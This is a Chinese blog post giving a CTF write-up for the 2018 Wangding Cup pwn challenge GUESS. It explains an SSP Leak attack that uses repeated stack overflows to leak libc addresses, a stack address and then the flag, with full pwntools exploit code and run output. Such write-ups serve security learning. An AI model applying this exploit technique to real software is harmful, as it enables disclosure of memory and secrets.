<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.9.0">

    <!--[if lt IE 9]>
        <style>body {display: none; background: none !important} </style>
        <meta http-equiv="Refresh" Content="0; url=//outdatedbrowser.com/" />
    <![endif]-->

<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge, chrome=1">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=no">
<meta name="format-detection" content="telephone=no">
<meta name="author" content="4eriri">



<meta name="description" content="hint: libc基址泄露+flag泄露">
<meta property="og:type" content="article">
<meta property="og:title" content="2018网鼎杯pwn-GUESS">
<meta property="og:url" content="http://yoursite.com/2019/03/04/2018网鼎杯pwn-GUESS/index.html">
<meta property="og:site_name" content="4eriri&#39;s blog">
<meta property="og:description" content="hint: libc基址泄露+flag泄露">
<meta property="og:locale" content="default">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g0r4u9gwo2j30rw0oitdk.jpg">
<meta property="og:image" content="https://ws2.sinaimg.cn/large/006tKfTcgy1g0r55df11yj30f801qt8x.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tKfTcgy1g0r56yrwzaj31200hswjb.jpg">
<meta property="og:image" content="https://ws4.sinaimg.cn/large/006tKfTcgy1g0r5k5sxg6j30vm0t4aff.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g0r5ooe7bpj31q00u0jxc.jpg">
<meta property="og:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g0r5hhyg66j30ga01w74i.jpg">
<meta property="og:updated_time" content="2019-03-04T15:19:04.000Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="2018网鼎杯pwn-GUESS">
<meta name="twitter:description" content="hint: libc基址泄露+flag泄露">
<meta name="twitter:image" content="https://ws3.sinaimg.cn/large/006tKfTcgy1g0r4u9gwo2j30rw0oitdk.jpg">

<link rel="apple-touch-icon" href="/apple-touch-icon.png">


    <link rel="alternate" href="/atom.xml" title="4eriri&#39;s blog" type="application/atom+xml">



    <link rel="shortcut icon" href="/favicon.ico">



    <link href="//cdn.bootcss.com/animate.css/3.5.1/animate.min.css" rel="stylesheet">



    <link href="//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.css" rel="stylesheet">



    <script src="//cdn.bootcss.com/pace/1.0.2/pace.min.js"></script>
    <link href="//cdn.bootcss.com/pace/1.0.2/themes/blue/pace-theme-minimal.css" rel="stylesheet">


<link rel="stylesheet" href="/css/style.css">



<link href="//cdn.bootcss.com/font-awesome/4.6.3/css/font-awesome.min.css" rel="stylesheet">


<title>2018网鼎杯pwn-GUESS | 4eriri&#39;s blog</title>

<script src="//cdn.bootcss.com/jquery/2.2.4/jquery.min.js"></script>
<script src="//cdn.bootcss.com/clipboard.js/1.5.10/clipboard.min.js"></script>

<script>
    var yiliaConfig = {
        fancybox: true,
        animate: true,
        isHome: false,
        isPost: true,
        isArchive: false,
        isTag: false,
        isCategory: false,
        fancybox_js: "//cdn.bootcss.com/fancybox/2.1.5/jquery.fancybox.min.js",
        scrollreveal: "//cdn.bootcss.com/scrollReveal.js/3.1.4/scrollreveal.min.js",
        search: true
    }
</script>


    <script> yiliaConfig.jquery_ui = [false]; </script>



    <script> yiliaConfig.rootUrl = "\/";</script>






</head></html>
<body>
  <div id="container">
    <div class="left-col">
    <div class="overlay"></div>
<div class="intrude-less">
    <header id="header" class="inner">
        <a href="/" class="profilepic">
            <img src="/img/avatar.png" class="animated zoomIn">
        </a>
        <hgroup>
          <h1 class="header-author"><a href="/">4eriri</a></h1>
        </hgroup>

        

        
            <form id="search-form">
            <input type="text" id="local-search-input" name="q" placeholder="search..." class="search form-control" autocomplete="off" autocorrect="off" searchonload="false" />
            <i class="fa fa-times" onclick="resetSearch()"></i>
            </form>
            <div id="local-search-result"></div>
            <p class='no-result'>No results found <i class='fa fa-spinner fa-pulse'></i></p>
        


        

        <div id="switch-area" class="switch-area">
            <div class="switch-wrap">
                <section class="switch-part switch-part1">
                    <nav class="header-menu">
                        <ul>
                        
                            <li><a href="/">主页</a></li>
                        
                            <li><a href="/archives/">所有文章</a></li>
                        
                        </ul>
                    </nav>
                    <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" href="mailto:itrickl@outlook.com" title="Email"></a>
                            
                                <a class="fa QQ" href="tencent://message/?uin=495764845&Site=4eriri&Menu=yes" title="QQ"></a>
                            
                        </ul>
                    </nav>
                </section>
                
                
                
                
                <section class="switch-part switch-part3">
                    <div id="js-friends">
                    
                      <a class="main-nav-link switch-friends-link" href="https://hexo.io">Hexo</a>
                    
                      <a class="main-nav-link switch-friends-link" href="https://pages.github.com/">GitHub</a>
                    
                      <a class="main-nav-link switch-friends-link" href="http://moxfive.xyz/">MOxFIVE</a>
                    
                    </div>
                </section>
                

                
            </div>
        </div>
    </header>                
</div>
    </div>
    <div class="mid-col">
      <nav id="mobile-nav">
      <div class="overlay">
          <div class="slider-trigger"></div>
          <h1 class="header-author js-mobile-header hide"><a href="/" title="回到主页">4eriri</a></h1>
      </div>
    <div class="intrude-less">
        <header id="header" class="inner">
            <a href="/" class="profilepic">
                <img src="/img/avatar.png" class="animated zoomIn">
            </a>
            <hgroup>
              <h1 class="header-author"><a href="/" title="回到主页">4eriri</a></h1>
            </hgroup>
            
            <nav class="header-menu">
                <ul>
                
                    <li><a href="/">主页</a></li>
                
                    <li><a href="/archives/">所有文章</a></li>
                
                <div class="clearfix"></div>
                </ul>
            </nav>
            <nav class="header-nav">
                        <ul class="social">
                            
                                <a class="fa Email" target="_blank" href="mailto:itrickl@outlook.com" title="Email"></a>
                            
                                <a class="fa QQ" target="_blank" href="tencent://message/?uin=495764845&Site=4eriri&Menu=yes" title="QQ"></a>
                            
                        </ul>
            </nav>
        </header>                
    </div>
    <link class="menu-list" tags="标签" friends="友情链接" about="关于我"/>
</nav>
      <div class="body-wrap"><article id="post-2018网鼎杯pwn-GUESS" class="article article-type-post" itemscope itemprop="blogPost">
  
    <div class="article-meta">
      <a href="/2019/03/04/2018网鼎杯pwn-GUESS/" class="article-date">
      <time datetime="2019-03-04T14:26:04.000Z" itemprop="datePublished">2019-03-04</time>
</a>


    </div>
  
  <div class="article-inner">
    
      <input type="hidden" class="isFancy" />
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      2018网鼎杯pwn-GUESS
    </h1>
  

      </header>
      
      <div class="article-info article-info-post">
        

        
        <div class="clearfix"></div>
      </div>
      
    
    <div class="article-entry" itemprop="articleBody">
      
          
        <p>hint: libc基址泄露+flag泄露</p>
<a id="more"></a>
<p>开启了canary保护</p>
<p>IDA观察一波：</p>
<p><img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g0r4u9gwo2j30rw0oitdk.jpg" alt></p>
<p>发现输入flag的地方有栈溢出，并且运行了一下发现一共可以输入3次，同时因为有fork的操作，所以即使第一次输入触发了canary，之后仍然可以进行第二第三次输入。</p>
<p>这里利用<a href="https://bbs.ichunqiu.com/forum.php?mod=viewthread&amp;tid=44069&amp;highlight=pwn" target="_blank" rel="noopener">SSP Leak</a>就可以泄漏libc基址和flag了。</p>
<p>触发canary后，程序会以<code>%s</code>输出<code>__libc_main_argv[0]</code>，可以通过栈溢出覆盖到这个位置的，从而泄漏出想要泄漏的东西。</p>
<p>使用gdb对程序进行调试，很方便就能得到该位置：</p>
<p><img src="https://ws2.sinaimg.cn/large/006tKfTcgy1g0r55df11yj30f801qt8x.jpg" alt></p>
<p><code>__libc_main_argv[0]=0x7fffffffdde8</code></p>
<p>在gets函数后下断点，对栈进行观察，找到输入在栈中的位置：</p>
<p><img src="https://ws4.sinaimg.cn/large/006tKfTcgy1g0r56yrwzaj31200hswjb.jpg" alt></p>
<p>这里我输入的是随便打的<code>tyuio</code></p>
<p><code>input=0x7fffffffdcc0</code></p>
<p>所以需要的填充为：<code>0x7fffffffdde8-0x7fffffffdcc0=296</code></p>
<p>不知道libc版本的话，三次栈溢出貌似不太够用，所以我先泄漏了两个libc函数地址，手动找到了libc版本。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *sh=process(&quot;./GUESS&quot;)elf=ELF(&quot;./GUESS&quot;)puts_got=elf.got[&quot;puts&quot;]</span><br><span class="line">start_got=elf.got[&quot;__libc_start_main&quot;]</span><br><span class="line">sh.recvuntil(&apos;Please type your guessing flag&apos;)sh.sendline(&quot;a&quot;*296+p64(puts_got))sh.recvuntil(&apos;*** stack smashing detected ***: &apos;)puts_add=u64(sh.recv(6)+&quot;\x00\x00&quot;)</span><br><span class="line">print hex(puts_add)</span><br><span class="line">sh.recvuntil(&apos;Please type your guessing flag&apos;)sh.sendline(&quot;a&quot;*296+p64(start_got))sh.recvuntil(&apos;*** stack smashing detected ***: &apos;)start_add=u64(sh.recv(6)+&quot;\x00\x00&quot;)</span><br><span class="line">print hex(start_add)</span><br></pre></td></tr></table></figure>
<p>一开始接受地址的时候，recv了8个字节，结果出了问题，从上面的栈图中也可以发现，64位程序内存的地址貌似最多只有6个字节，因此接受6个字节，再加2个<code>\x00</code>就可以了。</p>
<p>运行得到两个libc函数的地址：</p>
<p><img src="https://ws4.sinaimg.cn/large/006tKfTcgy1g0r5k5sxg6j30vm0t4aff.jpg" alt></p>
<p>通过<a href="https://libc.blukat.me/?q=__libc_start_main%3A740%2Cputs%3A690&amp;l=libc6_2.23-0ubuntu10_amd64" target="_blank" rel="noopener">网站在线查询</a>可以得到libc版本（其实也可以用LibcSearcher这个库，但最近重装虚拟机还没弄好）：</p>
<p><img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g0r5ooe7bpj31q00u0jxc.jpg" alt></p>
<p>得到基址：<code>libc_base=puts_add-0x06f690</code></p>
<p>为了泄漏flag，还要知道栈的地址。</p>
<p>libc里有*environ指针指向栈地址，所以可以通过这个指针泄漏栈地址。</p>
<p>在刚刚的网站可以查到_environ与libc基址之间的偏移。</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">environ_add=libc_base+0x3c6f38sh.recvuntil(&apos;Please type your guessing flag&apos;)sh.sendline(&quot;a&quot;*296+p64(environ_add))sh.recvuntil(&apos;*** stack smashing detected ***: &apos;)stack_add=u64(sh.recv(6)+&quot;\x00\x00&quot;)</span><br></pre></td></tr></table></figure>
<p>得到了栈地址之后，只要知道flag在栈中的偏移，就可以泄漏flag。</p>
<p>通过gdb查看栈地址：</p>
<p><img src="https://ws3.sinaimg.cn/large/006tKfTcgy1g0r5hhyg66j30ga01w74i.jpg" alt></p>
<p>计算flag在栈中偏移：</p>
<p><code>0x7fffffffddf8-0x7fffffffdc90=360</code></p>
<p>最终exp：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">from pwn import *sh=process(&quot;./GUESS&quot;)elf=ELF(&quot;./GUESS&quot;)puts_got=elf.got[&quot;puts&quot;]sh.recvuntil(&apos;Please type your guessing flag&apos;)sh.sendline(&quot;a&quot;*296+p64(puts_got))sh.recvuntil(&apos;*** stack smashing detected ***: &apos;)puts_add=u64(sh.recv(6)+&quot;\x00\x00&quot;)libc_base=puts_add-0x06f690environ_add=libc_base+0x3c6f38sh.recvuntil(&apos;Please type your guessing flag&apos;)sh.sendline(&quot;a&quot;*296+p64(environ_add))sh.recvuntil(&apos;*** stack smashing detected ***: &apos;)stack_add=u64(sh.recv(6)+&quot;\x00\x00&quot;)sh.recvuntil(&apos;Please type your guessing flag&apos;)sh.sendline(&quot;a&quot;*296+p64(stack_add-360))sh.recvuntil(&apos;*** stack smashing detected ***: &apos;)flag=sh.recvuntil(&quot;&#125;&quot;)print flag</span><br></pre></td></tr></table></figure>
<p>运行结果：</p>
<figure class="highlight plain"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">parallels@parallels-vm:~$ python guess.py[+] Starting local process &apos;./GUESS&apos;: pid 22240[*] &apos;/home/parallels/GUESS&apos;    Arch:     amd64-64-little    RELRO:    Partial RELRO    Stack:    Canary found    NX:       NX enabled    PIE:      No PIE (0x400000)[*] Process &apos;./GUESS&apos; stopped with exit code 0 (pid 22240)flag&#123;just4eriri&#125;</span><br></pre></td></tr></table></figure>

      
    </div>
    
  </div>
  
    
    <div class="copyright">
        <p><span>本文标题:</span><a href="/2019/03/04/2018网鼎杯pwn-GUESS/">2018网鼎杯pwn-GUESS</a></p>
        <p><span>文章作者:</span><a href="/" title="回到主页">4eriri</a></p>
        <p><span>发布时间:</span>2019-03-04, 22:26:04</p>
        <p><span>最后更新:</span>2019-03-04, 23:19:04</p>
        <p>
            <span>原始链接:</span><a class="post-url" href="/2019/03/04/2018网鼎杯pwn-GUESS/" title="2018网鼎杯pwn-GUESS">http://yoursite.com/2019/03/04/2018网鼎杯pwn-GUESS/</a>
            <span class="copy-path" data-clipboard-text="原文: http://yoursite.com/2019/03/04/2018网鼎杯pwn-GUESS/　　作者: 4eriri" title="点击复制文章链接"><i class="fa fa-clipboard"></i></span>
            <script> var clipboard = new Clipboard('.copy-path'); </script>
        </p>
        <p>
            <span>许可协议:</span><i class="fa fa-creative-commons"></i> <a rel="license" href="http://creativecommons.org/licenses/by-nc-sa/4.0/" title="CC BY-NC-SA 4.0 International" target = "_blank">"署名-非商用-相同方式共享 4.0"</a> 转载请保留原文链接及作者。
        </p>
    </div>



    <nav id="article-nav">
        
            <div id="article-nav-newer" class="article-nav-title">
                <a href="/2019/03/12/32位程序调用64位代码/">
                    调用64位代码的32位程序逆向
                </a>
            </div>
        
        
            <div id="article-nav-older" class="article-nav-title">
                <a href="/2019/02/24/安恒杯2019年2月月赛/">
                    安恒杯2019年2月月赛
                </a>
            </div>
        
    </nav>

  
</article>

    <div id="toc" class="toc-article">
        <strong class="toc-title">文章目录</strong>
        
            
        
    </div>
    <style>
        .left-col .switch-btn,
        .left-col .switch-area {
            display: none;
        }
        .toc-level-3 i,
        .toc-level-3 ol {
            display: none !important;
        }
    </style>

    <input type="button" id="tocButton" value="隐藏目录"  title="点击按钮隐藏或者显示文章目录">

    <script>
        yiliaConfig.toc = ["隐藏目录", "显示目录", !!"false"];
    </script>



    
<div class="share">
    
        <div class="bdsharebuttonbox">
            <a href="#" class="fa fa-twitter bds_twi" data-cmd="twi" title="分享到推特"></a>
            <a href="#" class="fa fa-weibo bds_tsina" data-cmd="tsina" title="分享到新浪微博"></a>
            <a href="#" class="fa fa-qq bds_sqq" data-cmd="sqq" title="分享给 QQ 好友"></a>
            <a href="#" class="fa fa-files-o bds_copy" data-cmd="copy" title="复制网址"></a>
            <a href="#" class="fa fa fa-envelope-o bds_mail" data-cmd="mail" title="通过邮件分享"></a>
            <a href="#" class="fa fa-weixin bds_weixin" data-cmd="weixin" title="生成文章二维码"></a>
            <a href="#" class="fa fa-share-alt bds_more" data-cmd="more"></i></a>
        </div>
        <script>
            window._bd_share_config={
                "common":{"bdSnsKey":{},"bdText":"2018网鼎杯pwn-GUESS　| 4eriri's blog　","bdMini":"2","bdMiniList":false,"bdPic":"","bdStyle":"0","bdSize":"24"},"share":{}};with(document)0[(getElementsByTagName('head')[0]||body).appendChild(createElement('script')).src='http://bdimg.share.baidu.com/static/api/js/share.js?v=89860593.js?cdnversion='+~(-new Date()/36e5)];
        </script>
    

    
</div>







    
        <section id="comments">
    <style> aside.comment-bar { margin: auto 30px; }</style>
    <div id="disqus_thread"></div>
    <script>
        var disqus_config = function(){
            this.page.url = 'http://yoursite.com/2019/03/04/2018网鼎杯pwn-GUESS/';
            this.page.identifier = '2019/03/04/2018网鼎杯pwn-GUESS/';
        };
        var loadComment = function(){
            var d = document, s = d.createElement('script');
            s.src = '//4eriri.disqus.com/embed.js';
            s.setAttribute('data-timestamp', +new Date());
            (d.head || d.body).appendChild(s);
        }
    </script>
    
    <script> loadComment(); </script>

</section>


    




    <div class="scroll" id="post-nav-button">
        
            <a href="/2019/03/12/32位程序调用64位代码/" title="上一篇: 调用64位代码的32位程序逆向">
                <i class="fa fa-angle-left"></i>
            </a>
        

        <a title="文章列表"><i class="fa fa-bars"></i><i class="fa fa-times"></i></a>

        
            <a href="/2019/02/24/安恒杯2019年2月月赛/" title="下一篇: 安恒杯2019年2月月赛">
                <i class="fa fa-angle-right"></i>
            </a>
        
    </div>

    <ul class="post-list"><li class="post-list-item"><a class="post-list-link" href="/2020/02/07/Hgame2020-Week4-Reverse/">Hgame2020_Week4_Reverse</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/01/Hgame-Week3-Reverse/">Hgame_Week3_Reverse</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/01/Hgame-Week3-Pwn-Annevi-Note/">Hgame_Week3_Pwn_Annevi_Note</a></li><li class="post-list-item"><a class="post-list-link" href="/2020/02/01/Hgame-Week3-Pwn-E99plant-Note/">Hgame_Week3_Pwn_E99plant_Note</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/12/14/领航杯2019线下pwn/">领航杯2019线下pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/11/14/RoarCTF2019-easy-pwn/">RoarCTF2019-easy_pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/26/KCTF2019Q3-卧薪尝胆/">KCTF2019Q3-卧薪尝胆</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/25/ciscn-2019-sw-7/">ciscn_2019_sw_7</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/24/中关村2019-one-string/">[中关村2019]one_string</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/23/ciscn-2019-final-5/">ciscn_2019_final_5</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/12/BYTECTF2019-vip/">BYTECTF2019-vip</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/11/De1taCTF2019-weapon/">De1taCTF2019-weapon</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/09/09/BYTECTF2019-mulnote/">BYTECTF2019-mulnote</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/19/SUCTF2019-hardCPP/">SUCTF2019-Akira Homework</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/19/SUCTF2019-playfmt/">SUCTF2019-playfmt</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/19/SUCTF2019-babyunic/">SUCTF2019-babyunic</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/09/ciscn2019-c06/">ciscn2019-c06</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/06/ciscn-2019-es-1/">ciscn_2019_es_1</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/03/ciscn-2019-es-4/">ciscn_2019_es_4</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/02/ciscn-2019-es-7/">ciscn_2019_es_7</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/08/01/hacknote/">攻防世界-hacknote</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/30/ciscn-2019-c-1/">ciscn_2019_emachine</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/07/29/babyheap-0ctf-2017/">babyheap_0ctf_2017</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/30/安恒杯2019年5月月赛/">安恒杯2019年5月月赛</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/19/ISCC2019-pwn01/">ISCC2019-pwn01</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/16/DDCTF2019-pwn/">DDCTF2019-pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/13/某awd的唯一pwn/">某awd的唯一pwn</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/05/04/ctf2019-quicksort/">*ctf2019-quicksort</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/19/DDCTF2019-Confused/">DDCTF2019-Confused</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/17/CGCTF-homura-note/">CGCTF-homura_note</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/15/从零开始的Ubuntu16-04配置/">从零开始的Ubuntu16.04配置</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/15/PinTool安装与简单使用/">PinTool安装与简单使用</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/04/08/bugku-pwn3/">bugku-pwn3</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/27/0ctf2017-babyheap/">0ctf2017-babyheap</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/26/栈-SROP/">栈-SROP</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/26/KCTF2019Q1/">KCTF2019Q1</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/19/某stack-4/">某stack-4</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/19/2014-HITCON-stkof/">2014 HITCON stkof</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/17/CONFidence2019-oldschool/">CONFidence2019-oldschool</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/13/CGCTF-note/">CGCTF-note</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/12/32位程序调用64位代码/">调用64位代码的32位程序逆向</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/03/04/2018网鼎杯pwn-GUESS/">2018网鼎杯pwn-GUESS</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/24/安恒杯2019年2月月赛/">安恒杯2019年2月月赛</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/12/HGAME2019-Say-Muggle-Code-a-k-a-SMC/">HGAME2019-Say-Muggle-Code a.k.a. SMC</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/10/outguess/">outguess</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/08/Math简单/">HGAME2019-Math简单</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/06/HGAME2019-python-bytecode/">HGAME2019-python-bytecode</a></li><li class="post-list-item"><a class="post-list-link" href="/2019/02/05/brainfxxker-s-revenge/">HGAME2019-brainfxxker's revenge</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/26/NCTF2018/">NCTF2018</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/21/格式化字符串/">格式化字符串</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/20/z3求解/">z3求解</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/07/basic-re-su/">basic-re-su</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/11/03/符号执行Angr/">符号执行Angr</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/31/MOCTF-1/">MOCTF-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/30/MCTF2018-2/">MCTF2018-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/27/MCTF2018-1/">MCTF2018-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/25/sus-gccc/">sus-gccc</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/24/实验吧-3/">实验吧-3</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/23/实验吧-2/">实验吧-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/22/实验吧-1/">实验吧-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/19/geek-no-gdb/">geek-no-gdb</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/15/CNSSrecruit-3/">CNSSrecruit-3</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/14/CNSSrecruit-2/">CNSSrecruit-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/13/CNSSrecruit-1/">CNSSrecruit-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/11/sus-unpackme/">sus-unpackme</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/11/geekgame-2/">geekgame-2</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/10/geekgame-1/">geekgame-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/08/bugku-re-1/">bugku-re-1</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/03/cgctf-stackoverflow/">CGCTF-stackoverflow</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/03/十一欢乐赛-pwn4/">十一欢乐赛-pwn4</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/03/十一欢乐赛-bss-stack/">十一欢乐赛-bss_stack</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/02/cgctf-born/">CGCTF-born</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/10/02/十一欢乐赛-reverse/">十一欢乐赛-reverse</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/09/29/cgctf-homuraVM/">CGCTF-homuraVM</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/09/26/sus-ccc/">sus-ccc</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/09/24/sus-accumulator/">sus-accumulator</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/09/24/sus-pyyy/">sus-pyyy</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/09/23/sus-helloworld/">sus-helloworld</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/09/22/bitx/">sus-bitx</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/09/22/base64/">base64</a></li><li class="post-list-item"><a class="post-list-link" href="/2018/09/21/480小时/">CGCTF-480小时精通c++</a></li></ul>




    <script>
        
    </script>
</div>
      <footer id="footer">
    <div class="outer">
        <div id="footer-info">
            <div class="footer-left">
                <i class="fa fa-copyright"></i> 
                2018-2020 4eriri
            </div>
            <div class="footer-right">
                <a href="http://hexo.io/" target="_blank" title="快速、简洁且高效的博客框架">Hexo</a>  Theme <a href="https://github.com/MOxFIVE/hexo-theme-yelee" target="_blank" title="简而不减 Hexo 双栏博客主题  v3.5">Yelee</a> by MOxFIVE <i class="fa fa-heart animated infinite pulse"></i>
            </div>
        </div>
        
            <div class="visit">
                
                    <span id="busuanzi_container_site_pv" style='display:none'>
                        <span id="site-visit" title="本站到访数"><i class="fa fa-user" aria-hidden="true"></i><span id="busuanzi_value_site_uv"></span>
                        </span>
                    </span>
                
                
                    <span>| </span>
                
                
                    <span id="busuanzi_container_page_pv" style='display:none'>
                        <span id="page-visit"  title="本页阅读量"><i class="fa fa-eye animated infinite pulse" aria-hidden="true"></i><span id="busuanzi_value_page_pv"></span>
                        </span>
                    </span>
                
            </div>
        
    </div>
</footer>
    </div>
    
<script data-main="/js/main.js" src="//cdn.bootcss.com/require.js/2.2.0/require.min.js"></script>

    <script>
        $(document).ready(function() {
            var iPad = window.navigator.userAgent.indexOf('iPad');
            if (iPad > -1 || $(".left-col").css("display") === "none") {
                var bgColorList = ["#9db3f4", "#414141", "#e5a859", "#f5dfc6", "#c084a0", "#847e72", "#cd8390", "#996731"];
                var bgColor = Math.ceil(Math.random() * (bgColorList.length - 1));
                $("body").css({"background-color": bgColorList[bgColor], "background-size": "cover"});
            }
            else {
                var backgroundnum = 1;
                var backgroundimg = "url(/background/bg-x.jpg)".replace(/x/gi, Math.ceil(Math.random() * backgroundnum));
                $("body").css({"background": backgroundimg, "background-attachment": "fixed", "background-size": "cover"});
            }
        })
    </script>





<div class="scroll" id="scroll">
    <a href="#" title="返回顶部"><i class="fa fa-arrow-up"></i></a>
    <a href="#comments" onclick="load$hide();" title="查看评论"><i class="fa fa-comments-o"></i></a>
    <a href="#footer" title="转到底部"><i class="fa fa-arrow-down"></i></a>
</div>
<script>
    // Open in New Window
    
        var oOpenInNew = {
            
            
            
            
            
            
             archives: ".archive-article-title", 
             miniArchives: "a.post-list-link", 
            
             friends: "#js-friends a", 
             socail: ".social a" 
        }
        for (var x in oOpenInNew) {
            $(oOpenInNew[x]).attr("target", "_blank");
        }
    
</script>

    <script>
        var originTitle = document.title;
        var titleTime;
        document.addEventListener("visibilitychange", function() {
            if (document.hidden) {
                document.title = "(つェ⊂) 我藏好了哦~ " + originTitle;
                clearTimeout(titleTime);
            }
            else {
                document.title = "(*´∇｀*) 被你发现啦~ " + originTitle;
                titleTime = setTimeout(function() {
                    document.title = originTitle;
                }, 2000);
            }
        })
    </script>

<script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js">
</script>
  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"debug":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"right","width":100,"height":200},"mobile":{"show":true},"log":false});</script></body>
</html>